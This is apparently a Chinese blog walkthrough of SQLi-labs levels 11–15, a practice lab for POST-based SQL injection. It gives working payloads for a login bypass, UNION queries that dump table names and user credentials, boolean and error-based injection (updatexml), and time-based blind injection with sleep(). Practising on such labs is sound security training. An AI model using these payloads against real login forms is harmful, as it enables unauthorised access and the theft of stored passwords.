SQLI-Less-11-15
网络安全  /  2024-12-19  /  14745浏览

Less-11

此关是Post类型的注入
代码分析
在这里插入图片描述

输入框可以使用密码来登录

username输入admin' or 1=1#,password随便输入一个字符,此处已经被#所注释

在这里插入图片描述使用union进行联合注入

username输入      1' union select 1,database()#password随意字符

在这里插入图片描述
1.查询所有数据库

1admin' union select 1,group_concat(schema_name) from information_schema.schemata#

2.接下来查询表名等

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述
3.查询列名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述4.查询username,password

-1' union select (select group_concat(username) from users), (select group_concat(password) from users)#

在这里插入图片描述


Less12

代码分析
在这里插入图片描述
payload

1") union select 1,user()##只需把上一关的Payload中的'替换为")即可注入

在这里插入图片描述


Less13

代码分析
在这里插入图片描述
布尔注入(图中打错字了,应该是没有回显,可以使用布尔注入…)

猜测数据库名

admin')and substr(database(),1,1)='s'#

在这里插入图片描述依次往下,使用之前的布尔注入语句

也可以使用报错注入

-1') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

在这里插入图片描述



Less14

代码分析
在这里插入图片描述

布尔注入

admin" and substr(database(),1,1)='s'##"闭合,往下的payload只需更换之前布尔注入的"即可

在这里插入图片描述



Less15

代码分析
在这里插入图片描述

1.判断数据库长度

admin' and If(length(database())=8,1,sleep(5))##IF()函数,length(database())=8为判断条件,条件正确执行1,条件错误为sleep(5)

在这里插入图片描述在这里插入图片描述

2.判断数据库名:

admin' and If(substr(database(),1,1)='s',1,sleep(5))--+

剩下的和第九关时间盲注类似第九关时间盲注链接


评论0